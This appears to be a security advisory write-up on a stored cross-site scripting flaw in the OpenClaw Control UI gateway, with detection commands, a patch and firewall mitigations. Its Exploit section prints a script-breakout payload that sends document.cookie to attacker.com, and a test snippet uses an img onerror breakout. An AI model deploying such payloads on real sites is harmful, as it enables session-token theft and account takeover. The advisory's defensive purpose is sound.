Listen to this Post
The vulnerability is a stored Cross-Site Scripting (XSS) issue in the OpenClaw Control UI. The gateway’s HTML response previously injected the `assistantName` and `assistantAvatar` values directly into an inline `` tag sequence. An attacker with the ability to modify these assistant identity values (such as an admin or operator) could set them to a malicious string containing </script><script>alert(1)</script>. When the Control UI page is rendered, the browser encounters the early closing tag, terminates the original script block, and executes the attacker’s injected JavaScript in the same origin. This allows the attacker to steal session tokens, perform privileged actions, or deface the UI. The issue is present in `openclaw` npm package versions `<= 2026.2.14` and is fixed in version `2026.2.15` .
Platform: OpenClaw npm
Version: <=2026.2.14
Vulnerability: Stored Cross-Site Scripting
Severity: Moderate severity
Date: 2026-02-18
Prediction: Patched 2026-02-19
What Undercode Say:
Analytics
1. Check current OpenClaw version
openclaw --version
2. Inspect the rendered HTML of the Control UI to see the vulnerable script injection
curl -s http://localhost:18789/ | grep -A 2 "<script>.assistant"
3. Simulate the vulnerable code pattern in a test file to understand the behavior
cat > test-xss.js << 'EOF'
const assistantName = '</script><img src=x onerror=alert(origin)>';
const injected = <code><script>window.assistant = ${JSON.stringify(assistantName)};</script></code>;
console.log(injected);
// Observe that the output breaks out of the script tag
EOF
node test-xss.js
4. Check gateway logs for any unusual assistant name changes (requires appropriate log level)
grep -i "assistant.name.updated" ~/.openclaw/logs/gateway.log
Exploit
<!-- Step 1: An attacker with admin access sets a malicious assistant name via API or config -->
<!-- Example malicious payload for assistantName: -->
</script><script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>
<!-- Step 2: When any user visits the Control UI, the payload executes -->
<!-- The vulnerable page originally contained: -->
<script>window.assistantConfig = {"name":${JSON.stringify(assistantName)},"avatar":${JSON.stringify(assistantAvatar)}};</script>
<!-- Step 3: With the payload, it becomes: -->
<script>window.assistantConfig = {"name":"</script><script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>","avatar":"..."};</script>
<!-- The browser parses this as two script tags, executing the second one. -->
Protection
1. Upgrade to the patched version npm install -g openclaw@latest Verify the version is at least 2026.2.15 openclaw --version 2. Verify the fix: config is now served from a JSON endpoint, not inline curl -s http://localhost:18789/api/bootstrap-config | jq . 3. Check that the Content Security Policy is active and restrictive curl -I http://localhost:18789/ | grep -i content-security-policy Expected: content-security-policy: script-src 'self' 4. If you cannot upgrade immediately, restrict access to the Control UI to trusted networks only (e.g., localhost and VPN) sudo ufw deny from any to any port 18789 sudo ufw allow from 127.0.0.1 to any port 18789 Also ensure the configuration endpoints are not exposed publicly
Impact
A successful exploit allows an attacker with configuration privileges to execute arbitrary JavaScript in the context of the OpenClaw Control UI. This can lead to theft of administrator session tokens, unauthorized modification of gateway settings, exposure of connected service credentials, and further compromise of the host system through chained attacks. Although the Control UI is intended for local use only, a compromised admin account or a cross-site request forgery attack on the configuration endpoints could trigger this stored XSS, affecting all users who subsequently visit the UI .
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

